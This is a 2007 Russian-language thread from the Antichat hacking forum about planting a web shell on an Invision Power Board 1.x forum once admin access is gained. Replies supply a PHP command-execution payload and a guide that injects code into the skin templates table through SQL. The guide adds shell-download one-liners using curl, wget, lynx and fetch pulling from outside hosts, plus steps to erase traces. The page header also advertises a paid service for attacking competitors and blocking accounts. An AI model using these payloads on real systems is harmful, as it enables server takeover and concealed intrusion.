Форум АНТИЧАТ - Несколько вопросов по IPB

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Несколько вопросов по IPB

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Несколько вопросов по IPB

17.05.2007, 23:37

anakreon

Познающий

Регистрация: 19.03.2006

Сообщений: 37

Провел на форуме:
400363

Репутация: 11

Несколько вопросов по IPB

В общем есть форум ипб 1.3
есть доступ к админке
Но...
нельзя залиться через смайлы

не могу через скуль залить в аплоадс (пишет что доступ запрещен)

через шаблоны выдает: "Этот файл является неправильным файлом шаблона для Invision Power Board"

Не смог понять как воспользоваться скулей типа

Код:

CREATE TABLE `ibf_shell` (`shl` TEXT NOT NULL) TYPE = MYISAM ;  INSERT INTO `ibf_shell` ( `shl` ) VALUES (`пхп-код`);  SELECT `shl` FROM `ibf_shell` INTO OUTFILE `путь/имяфайла.php`  DROP TABLE `ibf_shell`

какой именно пхп-код нужен и путь/имя файла чего именно?

Ах да. http запрос тоже не проходит

Люди добрые помогите плз. С меня плюсы

18.05.2007, 01:37

maxster

Участник форума

Регистрация: 27.10.2006

Сообщений: 205

Провел на форуме:
2298631

Репутация: 380

Отправить сообщение для maxster с помощью ICQ

php-code: system($_GET["cmd"]);

путь до папки аплоадс ( найдешь в генеральных настройках)

18.05.2007, 08:32

anakreon

Познающий

Регистрация: 19.03.2006

Сообщений: 37

Провел на форуме:
400363

Репутация: 11

Спасибо но не прокатило.
Выдал что

Код:

Access denied for user: 'тра-та-та@localhost' (Using password: YES)

Последний раз редактировалось anakreon; 18.05.2007 в 08:36..

18.05.2007, 15:01

maxster

Участник форума

Регистрация: 27.10.2006

Сообщений: 205

Провел на форуме:
2298631

Репутация: 380

у тебя нет прав, как правило они только у рута

Последний раз редактировалось maxster; 18.05.2007 в 15:04..

18.05.2007, 21:07

anakreon

Познающий

Регистрация: 19.03.2006

Сообщений: 37

Провел на форуме:
400363

Репутация: 11

ну это понятно. И какой же выход?

18.05.2007, 23:28

maxster

Участник форума

Регистрация: 27.10.2006

Сообщений: 205

Провел на форуме:
2298631

Репутация: 380

Код:

Привет, я DeusTirael.
Сейчас я покажу как можно залить шелл в ИПБ 1.* если не катит способ через смайлы.

Заходим в админку, выбираем SQL Management > mySQL Toolbox > 120_skin_templates

Нужно в столбце func_name изменить значение calendar_start_form 
на "aaa(){}}; system($_REQUEST[c]); class qwerty{function ggg"

Для этого делаем один запрос:
update 120_skin_templates set func_name="aaa(){}}; system($_REQUEST[c]); class qwerty{function bbb" where func_name="calendar_start_form";

Теперь ставим Use safe mode skins? > Yes

Готово! Заходим в календарь и в параметре 'c' передаем команды.

Заливаем нормальный шелл:
curl --output /papka/na/servere/shell.php http://site.com/shell.php
wget -o /papka/na/servere/shell.php http://site.com/shell.php
get http://site.com/shell.php > /papka/na/servere/shell.php
links -source "http://site.com/shell.php" > /papka/na/servere/shell.php
lynx -source http://site.com/shell.php > /papka/na/servere/shell.php
fetch -o /papka/na/servere/shell.php http://site.com/shell.php
get http://test2.ru/shells/rst.txt > uploads/sh.php

Чистим после себя:
Use safe mode skins? > No
update 120_skin_templates set func_name="calendar_start_form" where func_name="aaa(){}}; system($_REQUEST[c]); class qwerty{function bbb";

18.03.2007 by DeusTirael специально для DaMaGeLaB.OrG
Видео использовать только в целях ознакомления.

19.05.2007, 08:48

anakreon

Познающий

Регистрация: 19.03.2006

Сообщений: 37

Провел на форуме:
400363

Репутация: 11

Это я тоже делал. Тоже не катит. Выплевывает ошибку при смене safemod skins > да

Код:

Грубая ошибка: Невозможно произвести запись в файл conf_global - изменения не сохранены. Попробуйте изменить атрибут CHMOD на 0777

19.05.2007, 21:27

Doom123

Постоянный

Регистрация: 11.11.2006

Сообщений: 834

Провел на форуме:
3941248

Репутация: 668

Отправить сообщение для Doom123 с помощью ICQ

http://dump.ru/files/9/97097095/ вот!

видео... заливка шелла на ипб через настройки

19.05.2007, 23:33

maxster

Участник форума

Регистрация: 27.10.2006

Сообщений: 205

Провел на форуме:
2298631

Репутация: 380

Цитата:

Сообщение от Doom123

http://dump.ru/files/9/97097095/ вот!

видео... заливка шелла на ипб через настройки

Способ не актуален для ипб 1.*, он только для 2.*.*

#10

20.05.2007, 00:03

Doom123

Постоянный

Регистрация: 11.11.2006

Сообщений: 834

Провел на форуме:
3941248

Репутация: 668

да извените проморгал версию форума...

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
скрипт распознавания форума	genom--	Форумы	22	31.12.2008 15:06
Proxifier - несколько вопросов	Driver	Анонимность	2	16.07.2006 20:35
Несколько вопросов по IPB 2.0.4	Vilen	Форумы	1	01.07.2006 15:19
linux - несколько вопросов....	xSp1D3R	*nix	14	29.06.2005 16:09
Несколько вопросов по форуму phpBB 2.0.11	limbonic	Форумы	29	05.04.2005 13:06

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход